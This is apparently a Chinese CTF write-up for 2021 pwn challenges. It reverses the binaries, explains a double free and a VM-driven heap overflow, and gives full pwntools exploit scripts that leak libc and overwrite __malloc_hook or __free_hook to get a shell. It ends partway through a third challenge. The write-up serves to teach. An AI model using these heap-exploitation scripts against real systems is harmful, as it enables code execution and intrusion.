2021红明谷and虎符题解

2021-04-05

字数统计: 5.7k字 | 阅读时长≈ 30分

清明假期打了两场比赛，感觉最近题目的风格都变了，喜欢在pwn题里加上一大堆逆向，能逆就能解。还有就是疯狂套娃，出了两道arm+vm的形式，那以后可以出 mips+vm，riscv64+arm的题了。最后，希望后面可以学习更多的逆向知识。

Maybe_fun_game

题目分析

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  const char *v3; // rax
  char v4; // al
  const char *v5; // rax
  const char *buf2; // rax
  char v7; // cl
  __int64 v8; // rdx
  const char *buf; // rax
  char v10; // cl
  __int64 v11; // rdx

  sub_1460();
  while ( 1 )
  {
    while ( 1 )                                 // dele
    {
      while ( 1 )
      {
        menu();
        v3 = get_input();
        if ( !strcmp(v3, "ERROR") )
        {
          free(ptr);
          exit(0);
        }
        v4 = *v3;
        if ( v4 != 50 )
          break;
        free(chunk);
        chunk = 0LL;
        size = 0;
      }
      if ( v4 > 50 )
        break;
      if ( v4 == '1' )
      {
        output("Size >>");                      // add
        v5 = get_input();
        size = strtol(v5, 0LL, 10);
        free(ptr);
        if ( (unsigned int)(size - 1) <= 0x7E )
        {
          chunk = (char *)malloc(size);
          output("Content >>");
          buf = get_input();
          if ( size > 0 )
          {
            v10 = *buf;
            if ( *buf )
            {
              v11 = 1LL;
              do
              {
                chunk[v11 - 1] = v10;
                if ( size <= (int)v11 )
                  break;
                v10 = buf[v11++];
              }
              while ( v10 );
            }
          }
LABEL_18:
          free(ptr);		//释放ptr
        }
        else
        {
          output("Illegal size!");
        }
      }
      else
      {
LABEL_12:
        output("Your Choice is invaild.");
      }
    }
    if ( v4 == '3' )
    {
      output("Content >>");                     // edit
      buf2 = get_input();
      if ( size > 0 )
      {
        v7 = *buf2;
        if ( *buf2 != 10 )
        {
          v8 = 1LL;
          do
          {
            chunk[v8 - 1] = v7;
            if ( size <= (int)v8 )
              break;
            v7 = buf2[v8++];
          }
          while ( v7 != 10 );
        }
      }
      goto LABEL_18;
    }
    if ( v4 != '4' )
      goto LABEL_12;
    output(chunk);                              // show
  }
}

程序总体逻辑是一个菜单题，包含 add、edit、show三种功能。这三种功能没发现有啥问题。但是需要注意的是 ptr这个堆块，其在add功能读取输入结束后，会进行一次 free。而 ptr的生成是在 get_input函数中。

在输入和输出函数中都套了一个格式，和用 Base64进行加密了。

const char *sub_1070()
{
  __int64 i; // rax
  __int64 j; // rbp
  double v2; // xmm2_8
  double v3; // xmm1_8
  __int64 k; // rbp
  int v5; // eax
  double v6; // xmm1_8
  size_t op_size; // rdi
  __int64 v8; // r12
  void *chunk1; // rax
  int v10; // eax
  double v11; // xmm1_8
  double str_size; // xmm0_8
  __int64 v13; // rax
  void *chunk11; // rsi
  __int64 l; // rax
  __int64 v16; // rax
  char *v18; // rdi
  __int64 v19[2]; // [rsp+10h] [rbp-5058h]
  __int64 v20[2]; // [rsp+20h] [rbp-5048h]
  char buf[4096]; // [rsp+30h] [rbp-5038h] BYREF
  char buf2[8192]; // [rsp+1030h] [rbp-4038h] BYREF
  char v23[32]; // [rsp+3030h] [rbp-2038h] BYREF
  char v24[8160]; // [rsp+3050h] [rbp-2018h] BYREF
  unsigned __int64 v25; // [rsp+5038h] [rbp-30h]
  char v26[40]; // [rsp+5040h] [rbp-28h] BYREF

  v25 = __readfsqword(0x28u);
  memset(buf, 0, sizeof(buf));
  read(0, buf, 0x1000uLL);
  memset(buf2, 0, sizeof(buf2));
  sub_1800(buf, strlen(buf), buf2);		//base64解密
  v19[0] = 0x1234567812345678LL;
  for ( i = 0LL; i != 8; ++i )		//首先从前8字节比较输入头中是否有magic
  {
    if ( *((_BYTE *)v19 + i) != buf2[i] )	//magic 为 0x1234567812345678
    {
      v18 = "Illegal Magic!";
      goto LABEL_23;
    }
  }
  float1 = 0LL;
  for ( j = 0LL; j != 8; ++j )		//从8-16字节获取总的size=op_size+str_size+0x20
  {
    v2 = (double)buf2[j + 8];
    v3 = (double)(int)j;
    float1 = (unsigned int)(int)(pow(256.0, v3) * v2 + (double)(int)float1);
  }
  float2 = 0LL;
  for ( k = 0LL; k != 8; ++k )		//从16-24字节获取op_size
  {
    v5 = buf2[k + 16];
    v6 = (double)(int)k;
    op_size = (unsigned int)(int)(pow(256.0, v6) * (double)v5 + (double)(int)float2);
    float2 = op_size;
  }
  v8 = 0LL;
  chunk1 = malloc(op_size);		//根据op_size申请 op_chunk
  float3 = 0LL;
  float4 = chunk1;
  do							//从24-32字节获取str_size
  {
    v10 = buf2[v8 + 24];
    v11 = (double)(int)v8++;
    str_size = pow(256.0, v11) * (double)v10 + (double)(int)float3;		
    float3 = (unsigned int)(int)str_size;
  }
  while ( v8 != 8 );
  ptr = calloc((unsigned int)(int)str_size, 1uLL);		//根据str_size申请ptr
  if ( float1 != (unsigned int)(int)str_size + float2 + 32 )	//判断size?=str_size+op_size+0x20
  {
    v18 = "Illegal Head!";
LABEL_23:
    output(v18);
    free(ptr);			//释放ptr
    free(float4);		//释放head_chunk
    return "ERROR";
  }
  v20[0] = 0x4141414141414141LL;
  if ( float2 > 0 )
  {
    v13 = 0LL;
    do
    {
      *((_BYTE *)float4 + v13) = buf2[v13 + 32];	//从 32字节获取 key
      ++v13;
    }
    while ( float2 > v13 );
  }
  chunk11 = float4;
  for ( l = 0LL; l != 8; ++l )
  {
    if ( *((_BYTE *)v20 + l) != *((_BYTE *)float4 + l) )	//比较key是否正确，key=0x4141414141414141
    {
      strcpy(v23, "Illegal Key!Your key is ");
      memset(v24, 0, sizeof(v24));
      _strcpy_chk(&v23[24], float4, 0x2000LL);
      v18 = v23;
      goto LABEL_23;
    }
  }
  if ( float3 > 0 )
  {
    v16 = 0LL;
    do
    {
      *((_BYTE *)ptr + v16) = v26[v16 - 16368 + float2];	
      ++v16;
    }
    while ( float3 > v16 );
    chunk11 = float4;
  }
  free(chunk11);
  return (const char *)ptr;
}

这个读取输入函数总体逻辑也很清晰，但是加了一个格式，逆出来的格式如下。其中 str_size是我们输入字符的size，op_size是我们的 Head。

f1 = 0x1234567812345678
f2 = 0x4141414141414141
re = p64(f1)+p64(str_size+op_size+0x20)+p64(op_size)+p64(str_size)+p64(f2)
t = re+payload
c = base64.b64encode(t)

这里输入函数，有几个问题：

op_size由我们指定，可以通过malloc(op_size)，申请任意大小的堆块
str_size由我们指定，可以通过calloc(op_size)申请任意大小的堆块
发生错误时，依次释放了 ptr和 head_chunk

那么当我们在 add输入content时，使得输入发生错误，则会依次释放 ptr和 head_chunk，然后 add功能结束会再次释放 ptr，存在 double free

利用分析

泄露地址

首先通过 op_size申请大块，释放后放到 unsortedbin。然后通过 add得到 libc地址

劫持 malloc_hook

由于是在 2.23，在 fastbin中构造 double free，劫持 __malloc_hook，修改为 one_gadget来 getshell。

EXP

#encoding=utf-8
from pwn import *
import base64
import sys
reload(sys)
sys.setdefaultencoding('utf8')
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux','split','-h'])
filename = './Maybe_fun_game'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
else:
    p = remote('8.140.179.11', 13452)
    libc = ELF(libcname)
    elf = ELF(filename)

def enc(payload, str_size, op_size=8):
    f1 = 0x1234567812345678
    f2 = 0x4141414141414141
    re = p64(f1)+p64(str_size+op_size+0x20)+p64(op_size)+p64(str_size)+p64(f2)
    t = re+payload
    c = base64.b64encode(t)
    return c

def dec(content):
    t = base64.b64decode(content)
    data = t[0x28:]
    return data

def Add(size, payload, key, size1):
    global num
    d = p.recvuntil('eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==')
    print("choic:")
    p.sendline(enc('1', 1))
    print("size:")
    p.sendlineafter('eFY0EnhWNBIvAAAAAAAAAAgAAAAAAAAABwAAAAAAAABBQUFBQUFBQVNpemUgPj4=\n', enc(str(size),8))
    print("content:")
    if key ==1:
        p.sendlineafter('eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=',enc(payload, int(size)))
    elif key == 0:
        print("Error input")
        ps = enc(payload, size, size1)
        p.sendlineafter('eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=', ps)
    else:
        print("Error input2")
        ps = enc(payload, 0x20, size1)
        p.sendlineafter('eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=', ps)

def Delete():
    p.recvuntil("eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==")
    print("choic:")
    p.sendline(enc('2',1))

def Edit(payload):
    p.recvuntil("eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==")
    print("choic:")
    p.sendline(enc('3', 1))
    p.recvuntil('eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=')
    print("content:")
    p.send(enc(payload, len(payload)))

def Show():
    p.recvuntil("eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==")
    print("choic:")
    p.sendline(enc('4', 1))

gadgets = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def Pwn():
    #gdb.attach(p, 'bp $rebase(0xbba)')

    print("free big chunk:")
    payload = "a"*0x50
    Add(0x50, payload, key=0, size1=0x400)

    print("get little chunk")
    payload = b'/xe8/x98'
    Add(0x40, payload, key=1, size1=0x8)

    print("leak addr:")
    Show()
    p.recvuntil('\n')
    ad = p.recvuntil('\n',drop=True)
    libc_addr = u64(base64.b64decode(ad)[-6:].ljust(8,b'\x00'))
    print("libc_addr:",hex(libc_addr))

    libc_base = libc_addr -88-0x10 -libc.sym['__malloc_hook']+0x10000000000
    print("libc_base:",hex(libc_base))
    malloc_hook = libc.sym['__malloc_hook']+libc_base
    system_addr = libc.sym['system']+libc_base
    print("system:",hex(system_addr))

    print("double free")
    Add(0x60, 'a'*0x60, key=0, size1=0x60)
    print("malloc_hook")
    Add(0x60, p64(malloc_hook-0x23), key=2, size1=0x8)
    Edit(p64(malloc_hook-0x23))
    print('malloc 1')
    Add(0x60, 'a'*0x20, key=2, size1=0x8)
    gadget = gadgets[2]+libc_base
    payload = 'a'*0x13+p64(gadget)
    print('malloc 2')
    Add(0x60, payload, key=2, size1=0x8)
    print('malloc 3')
    Add(0x60, payload, key=2, size1=0x8)

    print("choic:")
    p.sendline(enc('1', 1))

    p.interactive()

Pwn()

appollo

一道 arm的 vm题，逆向难度挺大的，因为 ida伪代码有一些不全。首先hint给了这是一个车在地图上走的程序

程序分析

void menu()
{
  _QWORD v0[12]; // [xsp+58h] [xbp+58h]

  v0[0] = off_14010;
  v0[1] = off_14018[0];
  v0[2] = off_14020[0];
  v0[3] = off_14028[0];
  v0[4] = off_14030[0];
  v0[5] = off_14038[0];
  v0[6] = off_14040[0];
  v0[7] = off_14048[0];
  v0[8] = off_14050[0];
  v0[9] = off_14058;
  v0[10] = off_14060;
  v0[11] = off_14068;
  __asm { BR              X0 }
}

首先如 vm题一样有很多功能，这里有一个函数表如下所示共有10个函数，同时还有一个指令表与函数表一一对应：

.data:0000000000014010     off_14010       DCQ sub_EB8             ; DATA XREF: menu+20↑o
.data:0000000000014010                                             ; menu+24↑o
.data:0000000000014018     off_14018       DCQ create
.data:0000000000014020     off_14020       DCQ pos_dlt
.data:0000000000014028     off_14028       DCQ delete
.data:0000000000014030     off_14030       DCQ set_zero
.data:0000000000014038     off_14038       DCQ up
.data:0000000000014040     off_14040       DCQ down
.data:0000000000014048     off_14048       DCQ left
.data:0000000000014050     off_14050       DCQ right
.data:0000000000014058     off_14058       DCQ show
.data:0000000000014060     off_14060       DCQ finish
.data:0000000000014068     off_14068       DCQ pop

.rodata:0000000000003770     dword_3770      DCD 0xA, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                                             ; DATA XREF: .got:off_13FE8↓o
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 1, 3
.rodata:0000000000003770                     DCD 0xB, 4, 0xB, 2, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 7, 0xB
.rodata:0000000000003770                     DCD 0xB, 8, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 9, 0xB, 0xB, 6, 0xB, 0xB, 0xB, 5, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB, 0xB
.rodata:0000000000003770                     DCD 0xB, 0xB

这里我们需要从指令表中获取相应的偏移，然后才能在函数表中执行对应的函数。比如这里想要执行第一个函数 create,那么需要输入 42,才能从指令表中获得 1。这里翻译过来的指令如下：

M_R = 42
delete = 47
set = 43
set0 = 45
up = 119
down = 115
left = 97
right = 100
show = 112
init = 77

然后分别看几个功能，首先必须初始化地图，这里 v1就是我们的输入，会依次读取我们的输入，和正常的 vm一样。

__int64 game_init()
{
  __int64 v1; // x29

  List = *(unsigned __int8 *)(*(_QWORD *)(v1 + 72) + 1LL);
  Row = *(unsigned __int8 *)(*(_QWORD *)(v1 + 72) + 2LL);
  if ( List > 16 || Row > 16 || List <= 3 || Row <= 3 )
  {
    puts("Abort");
    exit(255LL);
  }
  state = (__int64)calloc(List * Row, 1uLL);
  maps = (__int64)calloc(List * Row, 1uLL);
  flag = 1;
  *(_QWORD *)(v1 + 72) += 3LL;
  return (*(__int64 (**)(void))(v1 + 88 + 8LL * dword_3770[**(unsigned __int8 **)(v1 + 72)]))();
}

这个是创建车，输入4个参数，分别是车初始化所在的位置 list和 row表示，以及车的 size，分别是 size&0xff和 size>>8。

void create()
{
  __int64 v0; // x29
  __int64 v1; // x1
  int pos; // w19

  if ( flag )
  {
    *(_DWORD *)(v0 + 0x30) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 0x48) + 1LL);// L
    *(_DWORD *)(v0 + 0x34) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 0x48) + 2LL);// R
    *(_DWORD *)(v0 + 0x3C) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 0x48) + 3LL);
    *(_DWORD *)(v0 + 0x40) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 0x48) + 4LL);
    *(_DWORD *)(v0 + 0x44) = *(_DWORD *)(v0 + 0x3C) + (*(_DWORD *)(v0 + 0x40) << 8);// size
    if ( *(_DWORD *)(v0 + 0x30) < List
      && *(_DWORD *)(v0 + 0x34) < Row
      && !*(_BYTE *)(state + Row * *(_DWORD *)(v0 + 0x30) + *(_DWORD *)(v0 + 0x34))// positon
      && *(int *)(v0 + 0x44) > 0
      && *(int *)(v0 + 0x44) <= 0x600 )
    {
      *(_BYTE *)(state + Row * *(_DWORD *)(v0 + 0x30) + *(_DWORD *)(v0 + 0x34)) = 1;// psition=1
      v1 = (unsigned int)(Row * *(_DWORD *)(v0 + 0x30));
      pos = v1 + *(_DWORD *)(v0 + 0x34);
      chunk_list[pos] = malloc(*(int *)(v0 + 0x44), v1);
      read(0LL, chunk_list[Row * *(_DWORD *)(v0 + 0x30) + *(_DWORD *)(v0 + 0x34)], *(int *)(v0 + 0x44));
      *(_QWORD *)(v0 + 0x48) += 5LL;
      JUMPOUT(0xED0LL);
    }
    JUMPOUT(0x256CLL);
  }
  puts("Abort");
  exit(255LL);
}

这里是删除车，两个参数，车的坐标 list和 row。删除车后，会将对应坐标点置为0.

void Delete()
{
  __int64 v0; // x29

  if ( flag1 )
  {
    *(_DWORD *)(v0 + 48) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 72) + 1LL);// list
    *(_DWORD *)(v0 + 52) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 72) + 2LL);// row
    if ( *(_DWORD *)(v0 + 48) < List
      && *(_DWORD *)(v0 + 52) < Row
      && *(_BYTE *)(state + Row * *(_DWORD *)(v0 + 48) + *(_DWORD *)(v0 + 52)) == 1
      && *((_QWORD *)&chunk_list + Row * *(_DWORD *)(v0 + 48) + *(_DWORD *)(v0 + 52)) )
    {
      free(*((void **)&chunk_list + Row * *(_DWORD *)(v0 + 48) + *(_DWORD *)(v0 + 52)));// free(chunk[idx])
      *((_QWORD *)&chunk_list + Row * *(_DWORD *)(v0 + 48) + *(_DWORD *)(v0 + 52)) = 0LL;// chunk[idx]=0
      *(_BYTE *)(state + Row * *(_DWORD *)(v0 + 48) + *(_DWORD *)(v0 + 52)) = 0;// used[idx]=0
      *(_QWORD *)(v0 + 72) += 3LL;              // sp
      JUMPOUT(0xED0LL);
    }
    JUMPOUT(0x256CLL);
  }
  puts("Abort");
  exit(255);
}

这个是给地图设置边界，输入三个参数边界所在坐标，以及边界值。但是前提是该边界没有值，且值只能为 2，3，4.

void pos_set()
{
  __int64 v0; // x29

  if ( flag )
  {
    *(_DWORD *)(v0 + 0x30) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 0x48) + 1LL);// L
    *(_DWORD *)(v0 + 0x34) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 0x48) + 2LL);// R
    *(_DWORD *)(v0 + 0x38) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 0x48) + 3LL);// 取出前三个字节
    if ( *(_DWORD *)(v0 + 0x30) < List
      && *(_DWORD *)(v0 + 0x34) < Row
      && !*(_BYTE *)(state + Row * *(_DWORD *)(v0 + 0x30) + *(_DWORD *)(v0 + 0x34))
      && *(int *)(v0 + 0x38) > 1
      && *(int *)(v0 + 0x38) <= 4 )
    {
      *(_BYTE *)(state + Row * *(_DWORD *)(v0 + 0x30) + *(_DWORD *)(v0 + 0x34)) = *(_DWORD *)(v0 + 0x38);// MAP[pos]=num
      *(_QWORD *)(v0 + 0x48) += 4LL;
      JUMPOUT(0xED0LL);
    }
    JUMPOUT(0x256CLL);
  }
  puts("Abort");
  exit(255LL);
}

这是将边界清空。

void set_zero()
{
  __int64 v0; // x29

  if ( flag )
  {
    *(_DWORD *)(v0 + 0x30) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 72) + 1LL);
    *(_DWORD *)(v0 + 0x34) = *(unsigned __int8 *)(*(_QWORD *)(v0 + 72) + 2LL);
    if ( *(_DWORD *)(v0 + 48) < List
      && *(_DWORD *)(v0 + 52) < Row
      && *(unsigned __int8 *)(state + Row * *(_DWORD *)(v0 + 0x30) + *(_DWORD *)(v0 + 0x34)) > 1u
      && *(unsigned __int8 *)(state + Row * *(_DWORD *)(v0 + 0x30) + *(_DWORD *)(v0 + 0x34)) <= 4u )
    {
      *(_BYTE *)(state + Row * *(_DWORD *)(v0 + 0x30) + *(_DWORD *)(v0 + 0x34)) = 0;// MAP[pos]=0
      *(_QWORD *)(v0 + 72) += 3LL;
      JUMPOUT(0xED0LL);
    }
    JUMPOUT(0x256CLL);
  }
  puts("Abort");
  exit(255LL);
}

后面4个函数就是控制车的移动。分别是 up、down、left、right。这里我们以 down分析。首先会判断向纵坐标走一步时，前面是否有边界，如果边界为0则直接向前走，并将坐标设置为 5。如果有边界，边界等于 2或3时，会向前走两个纵坐标，并将纵坐标加2。最后会在 map的现在车辆坐标处写上当前行动次数。

void down()
{
  __int64 v0; // x29
  char v1; // w0

  if ( flag )
  {
    if ( List - 1 > y && *(_BYTE *)(state + (y + 1) * Row + x) != 1 && *(_BYTE *)(state + (y + 1) * Row + x) != 4 )	//判断是否超出边界
    {
      *(_BYTE *)(state + y * Row + x) = 0;
      if ( *(_BYTE *)(state + (y + 1) * Row + x) )	//有边界
      {
        if ( *(_BYTE *)(state + (y + 1) * Row + x) == 2 || *(_BYTE *)(state + (y + 1) * Row + x) == 3 )
        {	//边界值为2或3
          *(_BYTE *)(state + (y + 2) * Row + x) = 5;	//当前车的state纵坐标加2，坐标重新赋值为5
          y += 2;	//纵坐标加2
        }
      }
      else
      {
        *(_BYTE *)(state + ++y * Row + x) = 5;	//没有边界，纵坐标加1
      }
    }
    v1 = cn++;
    *(_BYTE *)(maps + y * Row + x) = v1;	//maps中当前车坐标处写上行动次数 v1
    ++*(_QWORD *)(v0 + 72);
    JUMPOUT(0xED0LL);
  }
  puts("Abort");
  exit(255LL);
}

那么这里就存在一个漏洞。首先看一下 state、maps和车的三个堆块的布局，可以看到 maps和 car是相连的。

0x40009d32a0:   0x0000000000000000      0x0000000000000081	//state
0x40009d32b0:   0x0000000000000000      0x0000000000000000
0x40009d32c0:   0x0000000000000000      0x0000000000000000
0x40009d32d0:   0x0000000000000000      0x0000000000000000
0x40009d32e0:   0x0000000000000000      0x0000000000000000
0x40009d32f0:   0x0000000000000000      0x0000000000000000
0x40009d3300:   0x0000010101010100      0x0000000000000000
0x40009d3310:   0x0000000000000000      0x0000000000000000	//设置边界为2
0x40009d3320:   0x0000000000000000      0x0000000000000081	//maps
0x40009d3330:   0x0000000000000000      0x0000000000000000
0x40009d3340:   0x0000000000000000      0x0000000000000000
0x40009d3350:   0x0000000000000000      0x0000000000000000
0x40009d3360:   0x0000000000000000      0x0000000000000000
0x40009d3370:   0x0000000000000000      0x0000000000000000
0x40009d3380:   0x0000000000000000      0x0000000000000000
0x40009d3390:   0x0000000000000000      0x0000000000000000
0x40009d33a0:   0x0000000000000000      0x0000000000000101	//car
0x40009d33b0:   0x0000000000000020      0x0000000000000021
0x40009d33c0:   0x0000000000000020      0x0000000000000021
0x40009d33d0:   0x0000000000000020      0x0000000000000021

当我们通过 set将 state的边界设置在 state+0x70处，并设置为2。然后通过 down函数不断纵坐标加，当遇到我们设置的边界2时，即会将 y+2，就是跳过边界，实现溢出。而如果我们将 row设置为 8，跳过边界后，此时 y+2后，刚好溢出 0x10，最后执行如下代码时：

1	(_BYTE )(maps + y * Row + x) = v1; //maps中当前车坐标处写上行动次数 v1

就能溢出改写 car的 size。如果我们精准的将 v1的值置为 0x20，那么 car的堆块 size扩大，即实现了堆重叠。

利用分析

泄露地址

可以利用释放大块到unsortedbin，来泄露地址。

getshell

利用上面的堆溢出修改 car的 chunk为 0x121，然后释放其后面相邻的堆块到 tcache。在释放 car到 tcache。在申请 0x120的堆块，就能覆盖后面空闲的堆块的堆头和next指针。最后劫持 free_hook即可。

EXP

from pwn import *
context.update(arch='aarch64',os='linux',log_level='debug')
context.terminal=(['tmux','split', '-h'])

filename = './apollo'
libcname = '/usr/aarch64-linux-gnu/lib/libc.so.6'
debug = 1
if debug == 1:
    #p = process(['qemu-aarch64-static','-L', "/usr/aarch64-linux-gnu", '-g', '1234',filename])
    p = process(['qemu-aarch64-static', '-L', "/usr/aarch64-linux-gnu", filename])
    libc = ELF(libcname)
else:
    p = remote('8.140.179.11', 51322)
    libc = ELF(libcname)
    elf = ELF(filename)

M_R = 42
delete = 47
set = 43
set0 = 45
up = 119
down = 115
left = 97
right = 100
show = 112
init = 77

def Add(list, row, size):
    payload = p8(M_R)+p8(list)+p8(row)+p8(size&0xff)+p8(size>>8)
    return payload

def Iint(l, r):
    payload = p8(init)+p8(l)+p8(r)
    return payload

def Set1(l, r, num):
    payload = p8(set)+p8(l)+p8(r)+p8(num)
    return payload

def Set0(l, r):
    payload = p8(set0)+p8(l)+p8(r)
    return payload

def Delete(l, r):
    return p8(delete)+p8(l)+p8(r)

def Up():
    return p8(up)

def Down():
    return p8(down)

def Left():
    return p8(left)

def Right():
    return p8(right)

def Show():
    return p8(show)

def Pwn():
    payload = b""
    payload += Iint(15, 8)
    payload += Add(10, 1, 0x500)
    #payload += Delete(10, 1)
    payload += Add(10, 2, 0x3f0)
    payload += Delete(10, 1)
    payload += Add(10, 1, 0xf8)
    payload += Add(10, 3, 0x8)
    payload += Add(10, 4, 0x10)
    payload += Add(10, 5, 0x10)
    payload += Show()
    payload += Set1(14, 0, 2)

    for i in range(0x1):
        payload += Right()+Left()

    for i in range(0x9):
        payload += Down()+Up()
    for i in range(14):
        payload += Down()

    payload += Delete(10, 1)
    payload += Delete(10, 4)
    payload += Delete(10, 3)
    payload += Add(10, 1, 0x118)
    payload += Add(10, 3, 0x8)  #/bin/sh
    payload += Add(10, 4, 0x8) #free_hook
    payload += Delete(10, 3)


    payload += Show()

    #gdb.attach(p, 'bp $rebase(0xed0)')
    p.sendlineafter('cmd> ', payload)

    raw_input()
    payload = '1'*8
    p.sendline(payload)
    print('got libc')
    raw_input()
    payload = (p64(0x20)+p64(0x21))*14
    p.sendline(payload)
    raw_input()
    payload = (p64(0x20) + p64(0x21)) * 14
    p.sendline(payload)
    print('leak libc')
    raw_input()
    p.send('a'*8)
    raw_input()
    p.send('4'*8)
    raw_input()
    p.send('5'*8)


    p.recvuntil('a'*8)
    libc_addr = u64(p.recvuntil('\n', drop=True).ljust(8,b'\x00'))
    libc_base = libc_addr+0x4000000000-0x16dac0
    print('libc_base:',hex(libc_base),hex(libc_addr))
    system_addr = libc_base+libc.sym['system']
    free_hook = libc_base+libc.sym['__free_hook']
    print("system:",hex(system_addr),hex(free_hook),hex(libc.sym['__free_hook']), hex(libc_base+libc.sym['free']))

    print('hajack free_hook')
    raw_input()
    payload = b'a'*0xf0+p64(0)+p64(0x21)+p64(free_hook)
    p.sendline(payload)

    print("put bin_sh")
    raw_input()
    payload = '/bin/sh\x00'
    p.send(payload)

    print('system')
    raw_input()
    payload = p64(system_addr)
    p.sendline(payload)

    p.interactive()

Pwn()

quiet

程序分析

又是一道 arm+vm，但是这道放的时间比较晚，所以觉得应该很简单。首先通过 mmap申请了一个大块，并赋予了可读可写可执行权限。所以猜测应该是跳转到这个堆块执行 shellcode。

__int64 sub_E40()
{
  __int64 v0; // x4
  __int64 v1; // x4
  __int64 v2; // x0
  int v3; // w0

  setvbuf(stdin, 0LL, 2LL, 0LL, 0LL);
  setvbuf(stdout, 0LL, 2LL, 0LL, v0);
  v2 = setvbuf(stderr, 0LL, 2LL, 0LL, v1);
  v3 = getpagesize(v2);
  qword_12070 = mmap(0x100000000000LL, v3, 7LL, 34LL, 0LL, 0LL);
  return alarm(32800LL);
}

找到了如下功能，能够跳转到 0x100000000000地址执行

.text:0000000000001098 0C0                 MOV             X0, X23
.text:000000000000109C 0C0                 BL              .free
.text:00000000000010A0 0C0                 LDR             X19, [X19,#0xFD0]
.text:00000000000010A4 0C0                 LDR             X1, [X29,#0xC0+var_8]
.text:00000000000010A8 0C0                 LDR             X0, [X19]
.text:00000000000010AC 0C0                 EOR             X0, X1, X0
.text:00000000000010B0 0C0                 CBNZ            X0, loc_1250
.text:00000000000010B4 0C0                 LDR             X20, [X20,#0xF98]
.text:00000000000010B8 0C0                 MOV             W1, #0xBEEF
.text:00000000000010BC 0C0                 LDP             X23, X24, [X29,#0xC0+var_90]
.text:00000000000010C0 0C0                 MOVK            W1, #0xDEAD,LSL#16
.text:00000000000010C4 0C0                 LDP             X25, X26, [X29,#0xC0+var_80]
.text:00000000000010C8 0C0                 MOV             W0, W1
